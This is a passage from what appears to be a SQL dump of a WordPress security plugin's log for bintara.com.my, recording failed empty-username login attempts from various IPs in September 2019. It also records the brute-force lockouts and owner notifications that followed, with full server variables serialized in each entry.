14:21:35',17936240,19341848,'https://bintara.com.my/2019/wp-login.php',1,0,'128.199.244.150'),(26233,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:21:36','2019-09-21 14:21:35',18142808,19341848,'https://bintara.com.my/2019/wp-login.php',1,0,'128.199.244.150'),(26234,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYyF3kXpgmG5P@iB8k8UQAAAIc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"185.52.2.165\";s:11:\"REMOTE_PORT\";s:5:\"44957\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYyF3kXpgmG5P@iB8k8UQAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075735.9424\";s:12:\"REQUEST_TIME\";s:10:\"1569075735\";}}','notice','2019-09-21 14:22:17','2019-09-21 14:22:16',17846256,19336520,'https://bintara.com.my/wp/wp-login.php',1,0,'185.52.2.165'),(26235,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:22:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:22:16\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:22:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:22:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:22:17','2019-09-21 14:22:16',17931040,19336520,'https://bintara.com.my/wp/wp-login.php',1,0,'185.52.2.165'),(26236,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:22:17','2019-09-21 14:22:16',18137496,19336520,'https://bintara.com.my/wp/wp-login.php',1,0,'185.52.2.165'),(26237,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYyGFiJ7D9Gn7wDPh8mAwAAAMg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"82.196.3.212\";s:11:\"REMOTE_PORT\";s:5:\"54997\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYyGFiJ7D9Gn7wDPh8mAwAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075736.2594\";s:12:\"REQUEST_TIME\";s:10:\"1569075736\";}}','notice','2019-09-21 14:22:17','2019-09-21 14:22:16',17850536,19342808,'https://bintara.com.my/test/wp-login.php',1,0,'82.196.3.212'),(26238,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:22:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:22:16\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:22:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:22:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:22:17','2019-09-21 14:22:16',17935456,19342808,'https://bintara.com.my/test/wp-login.php',1,0,'82.196.3.212'),(26239,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:22:17','2019-09-21 14:22:16',18142480,19342808,'https://bintara.com.my/test/wp-login.php',1,0,'82.196.3.212'),(26240,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYyKHkXpgmG5P@iB8k8bQAAAIA\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.164.110\";s:11:\"REMOTE_PORT\";s:5:\"45393\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYyKHkXpgmG5P@iB8k8bQAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075752.4149\";s:12:\"REQUEST_TIME\";s:10:\"1569075752\";}}','notice','2019-09-21 14:22:33','2019-09-21 14:22:32',17848920,19338568,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.164.110'),(26241,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:22:32\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:22:32\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:22:32\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:22:32\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:22:33','2019-09-21 14:22:32',17933840,19338568,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.164.110'),(26242,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:22:33','2019-09-21 14:22:32',18140968,19338568,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.164.110'),(26243,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYyPHkXpgmG5P@iB8k8cQAAAIU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"165.227.15.124\";s:11:\"REMOTE_PORT\";s:5:\"43794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYyPHkXpgmG5P@iB8k8cQAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075772.2104\";s:12:\"REQUEST_TIME\";s:10:\"1569075772\";}}','notice','2019-09-21 14:22:53','2019-09-21 14:22:52',17850968,19341600,'https://bintara.com.my/test/wp-login.php',1,0,'165.227.15.124'),(26244,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:22:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:22:52\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:22:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:22:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:22:53','2019-09-21 14:22:52',17935512,19341600,'https://bintara.com.my/test/wp-login.php',1,0,'165.227.15.124'),(26245,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:22:53','2019-09-21 14:22:52',18142136,19341600,'https://bintara.com.my/test/wp-login.php',1,0,'165.227.15.124'),(26246,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYydHkXpgmG5P@iB8k86AAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"42626\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYydHkXpgmG5P@iB8k86AAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075828.233\";s:12:\"REQUEST_TIME\";s:10:\"1569075828\";}}','notice','2019-09-21 14:23:49','2019-09-21 14:23:48',17850664,19341752,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.226.14'),(26247,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:23:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:23:48\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:23:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:23:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:23:49','2019-09-21 14:23:48',17935560,19341752,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.226.14'),(26248,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:23:49','2019-09-21 14:23:48',18142320,19341752,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.226.14'),(26249,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYygFiJ7D9Gn7wDPh8mIgAAAMY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"177.36.8.226\";s:11:\"REMOTE_PORT\";s:5:\"57380\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYygFiJ7D9Gn7wDPh8mIgAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:1